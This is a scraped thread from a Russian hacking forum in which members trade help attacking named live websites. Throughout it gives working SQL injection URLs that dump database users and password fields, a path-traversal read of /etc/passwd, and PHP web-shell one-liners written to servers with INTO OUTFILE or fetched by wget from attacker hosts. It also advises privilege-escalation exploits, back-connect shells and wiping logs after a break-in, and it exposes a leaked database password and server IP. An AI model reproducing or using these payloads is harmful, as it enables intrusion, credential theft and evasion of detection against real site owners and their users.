http://forum.antichat.ru/thread26983.html

_Pantera_ USAkid при декодировании получаеться какаой то мусор типа
1üÔ7__ø¹7x?8!2_Ñúª_oÓÒ!?K´U$

Ломаю http://kataliz.net много sql, но фильтрация обламывает.
при коментариев /* фильтр
при -- пропискает после себя)
НО при %00 выдаёт следущие.


http://kataliz.net/silencers/15%27%00

Software error:

HTML::Template->new() : Cannot open included file /home/katalizn/public_html/cgi-bin/Templates/Template_.tmpl : file not found. at /home/katalizn/public_html/cgi-bin/Template.pm line 1616
HTML::Template::_init_template('HTML::Template=HAS H(0x82efe14)') called at /home/katalizn/public_html/cgi-bin/Template.pm line 1189
HTML::Template::_init('HTML::Template=HASH(0x82efe 14)') called at /home/katalizn/public_html/cgi-bin/Template.pm line 1083
HTML::Template::new('HTML::Template', 'filename', '/home/katalizn/public_html/cgi-bin/Templates/Template_.tmpl', 'global_vars', 'on', 'die_on_bad_params', 0, 'search_path_on_include', 1, ...) called at siteengine.cgi line 116


--------------------------------------------------------------------------
Как бы обойти фильтрацию, и что эта за ошибка? в php скриптах раскритие питей на перл!? так чтоли?

tor4), при чем здесь %00? Это не комментарий.


Как бы обойти фильтрацию

Попробуй "#".

и что эта за ошибка?

Ты же сам уже ответил себе - раскрытие пути

в php скриптах раскритие питей на перл!? так чтоли?

Сам понял что сказал? :( Если у файла расширение php - далеко не факт, что это php скрипт. htaccess никто не отменял. Тем более, если ты внимательно прочтешь ошибку, то увидишь, что идет обращение к siteengine.cgi, а там может быть и такая ошибка. Откуда ты взял вообще перл?

Залил шелл, но все папки и файлы кромер upload read-only, chmod не меняет права доступа.
Т.е. все файлы читать можно, но вот переписать, удалить или перезалить шел в другую папку не выходит.

Можно ли как-то снять защиту от записи на файлах?

Залил шелл, но все папки и файлы кромер upload read-only, chmod не меняет права доступа.
Т.е. все файлы читать можно, но вот переписать, удалить или перезалить шел в другую папку не выходит.

Можно ли как-то снять защиту от записи на файлах?

узнай пароль от мускула .. попробуй подключится через фтп, если получится будут все папки доступны на запись

узнай пароль от мускула .. попробуй подключится через фтп, если получится будут все папки доступны на запись

Хм, а как через мускул, можно пароль к фтп узнать ?

Помогите плизз:

http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*

С SQL-Inj мало работал(

Помогите плизз:

http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*

С SQL-Inj мало работал(

1. Вот:

http://www.freedancer.ru/?module=messages&page=comments&messageid=2095'+and+1=2+union+select+1,2,3,4,5,6,7 ,8,9,unhex(hex(concat(version(),char(58),user()))) ,11,12--+

2. Постить в тему с SQL инъекциями, то что ты запостил - не следовало, это не SQL инъекция - это издевательство, да и тема та не для вопросов (ну за это ты уже словил минус).

3. Прочитай хотя бы одну статью про SQL инъекции и не смеши людей.

Хм, а как через мускул, можно пароль к фтп узнать ?
не через мускул, а через шелл который ты уже залил, читаешь файлы пхп смотришь конфиги для мускула. может быть тебе повезёт и пароль подойдёт к фтп.

Помогите плизз:

http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*

С SQL-Inj мало работал(

Немного покопался я....

http://www.freedancer.ru/?module=messages&page=comments&messageid=-2095'+union+select+1,2,3,4,5,6,7,8,9,AES_DECRYPT(A ES_ENCRYPT(version(),0x78),0x78),11,12+from+cms_si te_comments/*

если пойти дальше, можно найти читалку файлов...

http://www.freedancer.ru/?module=../../../../../../../../etc/passwd%00&cmd=list&dt=2

как видно magic_quotes_gpc = Off, что очень радует!

Далее регаемся, заливаем картинку с телом шелла в автару, путь будет примерно такой:

/home/www/stussy/freedancer/cache/avatars/image.jpg

С помощью читалки ищем дырку в каком нить скрипте, где будет возможен инклуд и инклудим сам шелл....

вот и все =)

такая фигня. взломал сайт, залил туда шелл (мадшелл с99). а он не показывает некоторые файлы =/

выполнял комманду ls -la - показывает все файлы (r57 показывает все)

с чем это может быть связано?

jon21
Линк в студию))) gg

Недавно при проведении скуль-инъекции возникла такая проблема - например, когда делаешь следующий запрос
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users/*
Скрипт выдает рандомное имя юзера из таблы, но стоит начать использовать лимит -
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+0,1/* или
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+1,1/*
То облом - скрипт ничего не выдает :( И так со всеми таблицами, что можно в таком случае сделать ?

0nep@t0p
limit+1+offset+1
Видел как то фильтрацию "," точнее не фильтрацию, конечно , но неадекватную реакцию на неё именно в лимите :D

Если нет, кинь линк в ПМ посмотрим

2 jokester
Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
Линк кинул в пм

Почему load_file() иногда доказывает содержимое дерикторий а иногда нет т.е. файлы читает а содержимое дерикторий не показывает, например load_file('/home/') дира есть а он содержимое не кажит

и как узнать какие диры на сервере есть чтоб знать где чего прочитать можно


ответ нашел всем спасибо)

ответ нашел
Поделись ответом, раз нашел :)

2 jokester
Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
Линк кинул в пм

попробуй в запрос дописать +where+1=1, т.е. он будет примерно таким : www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+where+1=1+l imit+1,1/*

есть читалка файлов

http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+load_file(0x2f6574632f706173737764) +from+users--


помогите найти путь к конфику апача

пробовал но не помогает:

/etc/httpd/conf/
/etc/apache/conf/
/etc/apache/
/etc/apache2/conf/
/var/httpd/conf
/var/www/conf
/usr/local/apache/conf/
/usr/local/apache2/conf/
/usr/local/httpd/conf/

Перебирай. https://forum.antichat.ru/showpost.php?p=467361&postcount=1
Ес-сно без ../../../ в начале.

Народ прошу помощи.
Вобщем есть рут доступ к PhpMyAdmin

Мне нужно залить шел, но проблема в том что там инклуды отключены :mad:
Я заливал с помощью такого запроса
CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
TYPE = MYISAM ;
INSERT INTO `forshelll` ( `shell` )
VALUES (
'<?php include("http://shell.ru/shell.php") ?>'
); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`

Ворпос! как можно ище залить без инклуда?

2 DJ ][akep
Юзай поиск, мне вот что часто помогало -
http://forum.antichat.ru/showpost.php?p=796617

Копал рыл ничего не нашёл! Гуру анти чата могет вы помогете!

www.dom2.ru есть уязвимости?

http://dom2.ru/pulse/heroes/?id=15601'

http://dom2.ru/magazine/?id=27965&article=3'
Жду ответа?
___________________________________________

И это уязвимость?
http://www.rk-triada.ru/index.php?-999

Ворпос! как можно ище залить без инклуда?
if(isset($_GET['shell'])) eval($_GET['shell']);
<?php system($_GET['cmd']);?>
Хотя смысл один и тот же...

[akep']Народ прошу помощи.
Вобщем есть рут доступ к PhpMyAdmin

Мне нужно залить шел, но проблема в том что там инклуды отключены :mad:
Я заливал с помощью такого запроса
CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
TYPE = MYISAM ;
INSERT INTO `forshelll` ( `shell` )
VALUES (
'<?php include("http://shell.ru/shell.php") ?>'
); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`

Ворпос! как можно ище залить без инклуда?
SELECT '<?php if(isset($_REQUEST["id"])) eval($_REQUEST["id"]);?>' INTO OUTFILE '/blablabla/www/script.php';

Если пхпмайадмин будет ругаться, то переводи текст в кавычках в SQL HEX:
http://hack-shop.org.ru/tools-code-encode
И потом уже без кавычек подставляй в запрос.

/script.php?id=copy("http://shellsite.ru/shell.txt","/blablabla/www/shell.php");

/shell.php - тут шелл. Ессно должны быть права на запись, иначе хер что сделаешь.

А не подскажите что можно сделать с сайтом у которого идёт фильтрация против SQl инъекций...
Движок: PHP-nuke
Модули:
/modules.php?name=WhatYourSpeed
/modules.php?name=Rules
/modules.php?name=Downloads
Ссылка: _http://la2ice.ru/

Доброго времени суток!
сайт http://geograd.ru/
magic_quotes off
мускул 5-ой версии
http://geograd.ru/?geo=-1&idnew=-328%27+union+select+1,2,3,4,table_schema+from+info rmation_schema.tables/*%22
тут все базы,судя по ним на серве крутится много сайтиков(если не прав,поправьте)
подскажите,как можно залить шелл на серв в данном случае?

<? system("cd ../../;wget http://...../shell.php"); ?>

cd ../../ - папка куда залить..
wget - качалка. взависимости еcть ли он на серве..
может быть lynx и т.д.
http://...../shell.php - твой сайт с php-шеллом

Ps: Если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать)
Поэтому советую xss или sql inj, дабы получить админ права. А у админа больше прав, там уже и до шела не далеко:)

Похоже что права есть... значит можно залить шелл использую into outfile '/Полный путь/имя.php
Нужно найти путь
запрос выглядеть будет так
union+select+1,2,'<? system($_GET["id"]); ?>',4,5+into outfile '/Полный путь/имя.php'/*

что мне даёт раскрытие пути до сайта ?
что можно с этим сделать ?

что мне даёт раскрытие пути до сайта ?
что можно с этим сделать ?
ты знаешь путь к папке, где лежат все скрипты сайта - следовательно ты знаешь куда можно залить шелл..
если есть файл-прив при скуль-инъекте то можешь опять же залить шелл, путь есть.. и вообще есть много способов как с этим расправится=)

всем привет,
в очередной раз наткнулся на такую неприятность, когда из 5 sql удалось выцепить все таблицы, но не одна из них не является таблицей с пользователями (все колонки в каждой просматрел) такое вообще возможно? И как с этим бороться?
Вот пример
_http://www.semenovsky.ru/?pageId=3&mode=cards&Id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+information_schema.TABLES++limit+16 ,200--
Заранее благодарен

всем привет,
в очередной раз наткнулся на такую неприятность, когда из 5 sql удалось выцепить все таблицы, но не одна из них не является таблицей с пользователями (все колонки в каждой просматрел) такое вообще возможно? И как с этим бороться?
Вот пример
_http://www.semenovsky.ru/?pageId=3&mode=cards&Id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+information_schema.TABLES++limit+16 ,200--
Заранее благодарен

такое вполне возможно,ничего такого тут нет,авторизация происходит значит по другому...
или на сайте вообще нет админки,что тоже вполне нормально для небольших проектов...
если я не прав,то поправьте)

1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables/* -фсЁ ок)
2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273/* -фсЁ ок)
3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+f rom+users/* -не пашет((((((((
что не так с финальным запросом???????????

http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,4,5,6+from+users/*
а где здесь фсё ок?

Вот тебе что наверное надо)
http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(username,0x3a,passw d),5,6+from+cms_user/*

1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables/* -фсЁ ок)
2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273/* -фсЁ ок)
3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+f rom+users/* -не пашет((((((((
что не так с финальным запросом???????????
Возможно таблица лежит в другой базе...сделай вот такой запрос и посмотри базы:
http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_schema,5,6+from+informa tion_schema.tables/*

MirA спасибо. Люди, а как быть здесь, есть вот чего
http://www.sarbc.ru/tvnew/print.phtml?type=2&channel_id=-1+union+select+concat_ws(0x3a,version(),user,passw ord),2,3+from+mysql.user+limit+34,50/*

http://www.sarbc.ru/tvnew/print.phtml?type=2&channel_id=-1+union+select+concat_ws(0x3a,version(),login,pass wd),2,3+from+user+limit+18,5/*

Но логины не подходят к админке http://www.sarbc.ru/admin
И хэш декодеры говорят, что мол, формат неверный, как быть-то вроде всё ж на ладони. Поможите пожалуйста, заранее благодарен.

1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables/* -фсЁ ок)
2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273/* -фсЁ ок)
3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+f rom+users/*
tor4),MirA
Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?

tor4),MirA
Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?

Проверил, инекция была и сплыла) Быстро работают админы.
Думаю пароли тоже сменил.

Ясн...:-(:-(:-(

вообще-то логи ведутся всегда (если конечно админ сам не отключил логирование).. другой вопрос смотрит ли админ в эти логи... если смотрит, то все ваши запросы там есть, значит видно где дырка и ее нужно исправить=)

Ясн...а мона этого как то избежат?
ну чтоб мои запросы не попадали в логи...

А Моя айпиха тож там светица?

Избежать нельзя.. Если только после взлома как такого не почистить логи. Твой Ip так же записывается в логах.

Ясн...
мля чувствую влипну кодат по неопытности...я то думал носки одевать кода в админику вхожу...а оно...

Что-же чистить после взлома?
Или где же эти логи?

Добрый день... из нескольких сайтов на хостинге нашел только один выдающий мне ошибку... но что-то я не догоняю...
http://www.site.ru/(любое значени)
если значение правильное ты выдается страница с инфой...
если аргумент число но неправильное то - нет такого раздела
В отсальных случаях...
НЕВОЗМОЖНО ВЫПОЛНИТЬ ЗАПРОС SELECT * FROM tree t, content c WHERE t.category_id=c.category_id AND t.category_id=1' потому что syntax error near ''' at line 1
Пробовал подбирать order by....
/1+order+by+10/*
в итоге всега одна и таже ошибка...
НЕВОЗМОЖНО ВЫПОЛНИТЬ ЗАПРОС SELECT * FROM tree t, content c WHERE t.category_id=c.category_id AND t.category_id=1+order+by+10 потому что syntax error near 'order+by+10' at line 1
Помогите плиз нубу...

может стоит открытая скобка, её нужно закрыть, можно попробовать group by, можно попробовать без пробелов, а с /**/, а может в конце нужно ставить не /*, а +--+. так и не угадаешь что там у тебя - адрес бы сказал

может стоит открытая скобка, её нужно закрыть, можно попробовать group by, можно попробовать без пробелов, а с /**/, а может в конце нужно ставить не /*, а +--+. так и не угадаешь что там у тебя - адрес бы сказал

Чего-то у меня никак =(

http://www.akkork.ru/

2 Art-Ge-Force таблицы теперь угадывай

http://man.firstvds.ru/mediaviewer.php?mid=M20'
ERROR:-2 DB Error: syntax error
SQL:SELECT mm_gid FROM media_mapping WHERE mm_media='M20\' AND mm_gedfile='1' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1]

Система PhpGedView
Как можно раскрутить иньекцию?

Бажный кусок кода:
$dbq = "SELECT mm_gid FROM ".$TBLPREFIX."media_mapping WHERE mm_media='".$mid."' AND mm_gedfile='".$GEDCOMS[$GEDCOM]['id']."'";
$dbr = dbquery($dbq);
while($row = $dbr->fetchRow()) {
if ($row[0] != $mid){
$media[$row[0]] = id_type($row[0]);
}
}
$medialist[$keyMediaList]['LINKS'] = $media;
return $media;
}
//Basically calls the get_media_relations method but it uses a file name rather than a media id.
function get_media_relations_with_file_name($filename){
global $TBLPREFIX, $BUILDING_INDEX, $DBCONN, $GEDCOMS, $GEDCOM;
$dbq = "select m_media from ".$TBLPREFIX."media where m_file='".$filename."' and m_gedfile='".$GEDCOMS[$GEDCOM]['id']."'";
$dbr = dbquery($dbq);
if (isset($dbr)){
while($result = $dbr->fetchRow()) {
$media_id = $result[0];
$media_array = get_media_relations($media_id);
return $media_array;
}
}
else{
return array();
}
}

Ershik
http://man.firstvds.ru/mediaviewer.php?mid=M20%2527
может чтото типа такого ?

Нет, при правильном запросте должно лицо выскакивать
http://man.firstvds.ru/mediaviewer.php?mid=M20

Не могу правильно составить запрос и поля.

http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_schema,5,6+from+informa tion_schema.tables/*
Сразу так:
_+union+select+111,222,concat_ws(0x3a,table_name,t able_schema),555,666+from+information_schema.colum ns+where+column_name+like+CHAR(37,112,97,115,37)+l imit+0,1/*

Чёт я не догнал,а где вывод?)

2reZon
покажи где инъекция - впадлу искать

2Ershik
никак - там ковычки экранизируются, а параметр в ковычках

у меня есть данные от бд хост логин база пароль, но на сервере нету phpMyAdmin
каким образом можно выполнить запрос в базе?

у меня есть данные от бд хост логин база пароль, но на сервере нету phpMyAdmin
каким образом можно выполнить запрос в базе?
пробуй коннкет на 3306 порт...
Так же пробуй похекать какой нить сайт через Reverse IP и подключиттца через шелл на похеканном сайте......

.Striker
1. файлы на сервер заливать можешь? Если можешь то залей RstMysql....
2. Попробуй удаленно к базе подключиться, тем же RstMysql... ;)

не получается подключится удаленно
вот файл конфигурации бд может у вас получится

<?
$usuarios_sesion="Administrador";
/*$sql_host="localhost"; // Host, nombre del servidor o IP del servidor Mysql.
$sql_usuario=""; // Usuario de Mysql a nivel remoto
$sql_pass=""; // contraseсa de Mysql a nivel remoto
$sql_db="purace_nuevo"; // Base de datos que se usarб a nivel remoto.*/

$sql_host="localhost"; // Host, nombre del servidor o IP del servidor Mysql.
$sql_usuario="purace_coconuco"; // Usuario de Mysql a nivel remoto
$sql_pass="bsn7502Pur"; // contraseсa de Mysql a nivel remoto
$sql_db="purace_newpurace"; // Base de datos que se usarб a nivel remoto.

$sql_tabla="usuarios"; // Nombre de la tabla que contendrб los datos de los usuarios
$link=mysql_connect ($sql_host,$sql_usuario,$sql_pass) or die ('I cannot connect to the database because: ' . mysql_error());
mysql_select_db ($sql_db,$link);





?>

ip 200.6.155.24

А зачем делать Unhex(hex()) ? :)

в большинстве случаев не получается! Залей на сайт скрипт для работы с Мускул и подключайся локально

.Striker, может это из-за того , что кроме основных данных для подключения передаётся еще
$usuarios_sesion="Administrador";

Nek1t, для обхода фильтрации.

Nek1t, для обхода фильтрации.
Например? Фильтрацию какого типа? Просто всегда без unhex(hex()) делал и как-то так получалось =)

Например? Фильтрацию какого типа? Просто всегда без unhex(hex()) делал и как-то так получалось =)
У меня нет примеров на все случаи жизнь. Вбей в гугле "unhex(hex(" и смотри где катит, где нет.

Никакую фильтрацию ты с помощью unhex(hex()) не обойдёшь :)

Это делается при проблемах с кодировкой. При прогоне через unhex(hex()) на выходе получаем уже нормальную кодировку.

$sql_host="localhost";

Подключица можно только с локальной тачки. Ломай соседний сайт, раз на этот не можешь ничего заливать.

upd:

jokester, А фильтрацию кавычек и прочих спец. символов? :)

jokester, А фильтрацию кавычек и прочих спец. символов? :)
Гм.. а как ты собираешься с помощью этого обходить фильтрацию ковычек?

Фильтрацию где?

jokester, например в load_file()

jokester, например в load_file()
Покажи как , вот пост из топика SQL:

Проверяем файл прив:

http://www.greenshift.com/news.php?id=97+union+select+1,LOAD_FILE(0x2f657463 2f706173737764),3,4,5,6,7,8,9,10,11,12/*
Есть файл

Смотрим ковычки:

http://www.greenshift.com/news.php?id=97+union+select+1,LOAD_FILE('/etc/passwd'),3,4,5,6,7,8,9,10,11,12/*

LOAD_FILE(\'/etc/passwd\')

Экранирует

Как их обойти с помощью unhex(hex()) ?

jokester, подзапросами :D Да, перепутал с load_file() =\ Когда тулзу свою писал там функции так называл, вот у меня всё и перемешалось. Да, unhex(hex()) только чтоб с кодировкой не гадать. Можно конечно чё-нить придумать...только толку ноль. Извиняюсь :[

http://www.milw0rm.com/exploits/2660

Я так понял,что для его запуска нужен пхп интерпретатор ? А то на вертриго не пашет.

.Begemot., бред про $usuarios_sesion="Administrador";, на подключение к мускулу на 3306 порт это никак не влияет =\

n0ne, $sql_host="localhost"; ещё не значит что подключение только с локалки, это просто для пшп срипта так написано. Что бы узнать наверняка надо лезть в mysql.user

jokester, фильтрация != экранирование. Вообще непонимаю про чё вы говорите, unhex/hex, как и cast(), convert(), aes_decrypt() и тп используется при выводе в неправильной кодировке
вообще то LOAD_FILE(0x2f657463 2f706173737764), здесь именно и идёт функция unhex, сама строчка /etc/passwd если её прогнать через функцию hex будет иметь вид 2f657463 2f706173737764, 0x ставиться для того что бы преоброзвать это дело в /etc/passwd
т.е. 0x2f657463 2f706173737764 = unhex(2f657463 2f706173737764)

0x ставиться для того что бы преоброзвать это дело в /etc/passwd
т.е. 0x2f657463 2f706173737764 = unhex(2f657463 2f706173737764)

Вообще 0x - стандартный префикс указывающий, что далее идёт 16ная система счисления, а не 8ая и не просто символы, к примеру. Это не синоним функции unhex(). В этом ты не прав.

Spyder Вместо того что-бы сразу написать, прочитай весь диалог,поймёшь о чём был спор, может тогда будет попроще :)
т.е. 0x2f657463 2f706173737764 = unhex(2f657463 2f706173737764)
Да ? :D

Qwazar, ну я просто неправильзно выразился. Но смысл то понятен
jokester, да я читал. Фильтрацию на самом деле можно обойти с помощью unhex(hex()), если это действительно фильтрация.

Spyder, везде где я видел в конфиге localhost - он был и в настройках. И соотв. то же самое и с удаленным подключением) По опыту сказал, а не по книжке :Р

ну просто удобнее указывать localhost
конечно если в таблице user в поле host стоит типа mysql.site_heckera.com , то и в скрипте будет mysql.site_heckera.com, а если там % то скорее вксего будет localhost
То что ты привёл не является правилом =) хотя я не спорю что в большинстве случаев если в скрипте localhost, то и в базе тоже самое

jokester, да я читал. Фильтрацию на самом деле можно обойти с помощью unhex(hex()), если это действительно фильтрация.
Какую фильтрацию? В каком месте? Как её можно обойти? Я вообще не понимаю о чём идёт речь.

Покажи на примере что ты имеешь ввиду

Это делается при проблемах с кодировкой. При прогоне через unhex(hex()) на выходе получаем уже нормальную кодировку.
А, ясно. Хотя вроде никогда проблем с кодировкой не было. Учту на будущее ;)

ну блин
jokester, представь себе скрипт в котором есть переменная id, уязвимая для скуль инжекта, и в этом же скрипте проверяется наличие слова password, к примеру. предварительно переведя в hex, мы получим на выводе билеберду, а потом проводя скуль инжект на том месте где нам нужно поставить слово password, ставим unhex(babla). Понятно?

Вообще вопрос изначально был для чего используется unhex(hex()) если уж быть точным, то для того чтобы переводить в 16-ную систему исчесления и перевода обратно =\
А уж ддя каких хэк целей вы там её юзаете, это другой вопрос
В основном, как сказал jokester для обхода проблемы с выводом в неправильной кодировке

ыы)))Какой наф обход фильтрации,если анхекс(хекс() взаимообратные функции? Жесть)).Попробуй поставить такую фильтрацию,и увидишь,что ничего не вышло)).Всё равно что urldecode(urlencode()) :D.А от левой кодировки спасает няф няф : ).

я написал про заранее переведённую строчку в хекс
не умничай

Ну флаг тебе =_=

@л-
:fыЂ“В
ПЫ9Ќ>—эp' џ›Ь?
ЪopСп�ґжх=

Скажет мне кто-нибудь наконец,что это за хня такая ?)).

кодировка не правильная ..

Опять двадцать пять))).Говори раз начал.Тогда скажи какая,или список где взять чтоли.Перепробывал utf8,latin1,cp1251 - а других я и не знаю.

можно как то поднять себе права на шелле?
Software: Apache/2.0.52 (CentOS). PHP/4.3.9

uname -a: Linux luz.emtel.net.co 2.6.9-11.ELsmp #1 SMP Wed Jun 8 17:54:20 CDT 2005 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

Хз,если файлы мошь заливать - лей сплойт(если полноценный шелл,а не как у меня =_=).Или перепроверь все схмоды ))

та я со своими правами только могу записывать файлы в в папку аплоадс.
Вот и заинтересовался поднятием прав

@л-
:fыЂ“В
ПЫ9Ќ>—эp' џ›Ь?
ЪopСп�ґжх=

Скажет мне кто-нибудь наконец,что это за хня такая ?)).
Например вот что :AES_ENCRYPT('www',1)
Или самописное что-то

Помогите залить шелл,
Админка,
http://beward.ru/
Логин:
Пасс:
На сайте есть sql очень простая, пароль в открытом виде.

раскритие пути
/home2/beward.ru/www/.php


Знаю что можно залить картинку с шелом но не умею их делать!
Как ещё можно залить, на данном примере.

Только что заливал картинку с шеллом, при её просмотре выкидывает на хостинг сайта.

При загрузке картинки проверки ни какой, можно залить похрен что хоть Войну и Мир.
Заливка происходит в скрипте pages_all.php.
Но при просмотре из админке мы видем что он записался в /pict/page-число.php
И это сбивает основательно, меня Sabe мучал пару часиков) за что ему спасибо и +.
Смотрим html, по поиску вбиваем /pict/ и видем что загружаются они совсем не из /pict/page-число.php
Пробуем. Так оно и есть. ух разобрался.
С первым шеллом меня.

.Striker, ищи на милворме или пакетсторме сплойт, заливай биндшелл или бэкконект и компиль сплойт :)

чрез удаленную базу возможно шелл залить на сайт? или можно только через локальную?

чрез удаленную базу возможно шелл залить на сайт? или можно только через локальную?
Удалённая (в случае наличия прав на into outfile) будет создавать файлы на сервере БД.

Что из себя представляет Trace метод... ???
Выдало в сканере, найти вразумительног она эту тему ничего не могу

искал на сайте аси

"HTTP/1.1 200 OK
Date: Thu, 04 Sep 2008 15:05:28 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: message/http


TRACE /TRACE_test HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) JSky/0.1
Host: www.icq.com
Accept: */*
"

в чем суть Trace ?

http://ru.wikipedia.org/wiki/HttpTRACE

Возвращает полученный запрос так, что клиент может увидеть, что промежуточные сервера добавляют или изменяют в запросе.

Привет всем, в чём подвох?
запрос:
http://www.ksr.infoshare.ru/lib/?div=-1+union+select+table_name+from+information_schema. tables+limit+24,50--
выдаёт "users"
А запрос:
http://www.ksr.infoshare.ru/lib/?div=-1+union+select+concat_ws(name,nik,pass)+from+users +limit+0,50--
Выдаёт "Table 'h_ksr.users' doesn't exist"
Как такое может быть и как с этим бороться?
Заранее спасибо

Там users лежит просто в другой БД, данные получать надо так:
http://www.ksr.infoshare.ru/lib/?div=-1+union+select+concat_ws(0x3a,name,nik,pass)+from+ aidsprintinfosha.users+limit+0,50--

Там users лежит просто в другой БД, данные получать надо так:
http://www.ksr.infoshare.ru/lib/?div=-1+union+select+concat_ws(0x3a,name,nik,pass)+from+ aidsprintinfosha.users+limit+0,50--
Благодарю

Нашел скулю, выводило :Query failed: The used SELECT statements have a different number of columns

1 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73 716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C 696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E 6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A66 6C6439,0x73716C696E6A666C643130,0x73716C696E6A666C 643131,0x73716C696E6A666C643132,0x73716C696E6A666C 643133,0x73716C696E6A666C643134,0x73716C696E6A666C 643135,0x73716C696E6A666C643136,0x73716C696E6A666C 643137,0x73716C696E6A666C643138,0x73716C696E6A666C 643139,0x73716C696E6A666C643230,0x73716C696E6A666C 643231,0x73716C696E6A666C643232,0x73716C696E6A666C 643233,0x73716C696E6A666C643234,0x73716C696E6A666C 643235,0x73716C696E6A666C643236,0x73716C696E6A666C 643237,0x73716C696E6A666C643238,0x73716C696E6A666C 643239,0x73716C696E6A666C643330,0x73716C696E6A666C 643331,0x73716C696E6A666C643332,0x73716C696E6A666C 643333,0x73716C696E6A666C643334,0x73716C696E6A666C 643335,0x73716C696E6A666C643336,0x73716C696E6A666C 643337,0x73716C696E6A666C643338,0x73716C696E6A666C 643339,0x73716C696E6A666C643430,0x73716C696E6A666C 643431,0x73716C696E6A666C643432,0x73716C696E6A666C 643433,0x73716C696E6A666C643434,0x73716C696E6A666C 643435,0x73716C696E6A666C643436,0x73716C696E6A666C 643437,0x73716C696E6A666C643438,0x73716C696E6A666C 643439,0x73716C696E6A666C643530,0x73716C696E6A666C 643531,0x73716C696E6A666C643532,0x73716C696E6A666C 643533,0x73716C696E6A666C643534,0x73716C696E6A666C 643535,0x73716C696E6A666C643536,0x73716C696E6A666C 643537,0x73716C696E6A666C643538,0x73716C696E6A666C 643539,0x73716C696E6A666C643630,0x73716C696E6A666C 643631,0x73716C696E6A666C643632,0x73716C696E6A666C 643633,0x73716C696E6A666C643634,0x73716C696E6A666C 643635,0x73716C696E6A666C643636,0x73716C696E6A666C 643637,0x73716C696E6A666C643638,0x73716C696E6A666C 643639,0x73716C696E6A666C643730,0x73716C696E6A666C 643731,0x73716C696E6A666C643732,0x73716C696E6A666C 643733,0x73716C696E6A666C643734,0x73716C696E6A666C 643735,0x73716C696E6A666C643736,0x73716C696E6A666C 643737,0x73716C696E6A666C643738,0x73716C696E6A666C 643739,0x73716C696E6A666C643830,0x73716C696E6A666C 643831,0x73716C696E6A666C643832,0x73716C696E6A666C 643833/*

перебрал до 54 вывело : not found in database

и что делать? даже Version() не знаю, поля для вывода какбы нету, но если пишу from mysql.user то матюкаеться что нету прав.
что делать?

ссылку бы

сдепая скуля .. ассии тебе в руки ..

2Grema
попробуй с order by, group by
и проверь на раскрытые скобки

че с этой мутью делать? как её перекодировать?
вывел с помощью mysql-inj:
Љ�гЊя

возможно это "свой" метод шифрования. Тебе бы не помешало посмотреть сорцы.
самый протсой метод шифрования - это:

1 беррётся Ascii код символа и к мне му прибавляется\отнимается\ка кое-то чисто. В итоге получается такая вот муть =)

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\'\'\'' at line 1

ничего и не получится - там параметр в ковычках, а ковычки экранизируются слешем

Возможно ли провести иньекцию.
http://www.karjeroscentras.lt/lt.php/ieskantiems_darbo/darbo_skelbimai/darbo_skelbimai/347;f_ctitle;UAB%20%22Aidma%27%22

нашол ошибки а за юзать не выходит.

Возможно ли провести иньекцию.
Возможно! (Чуть не написал "легко", нифига не так просто. :))
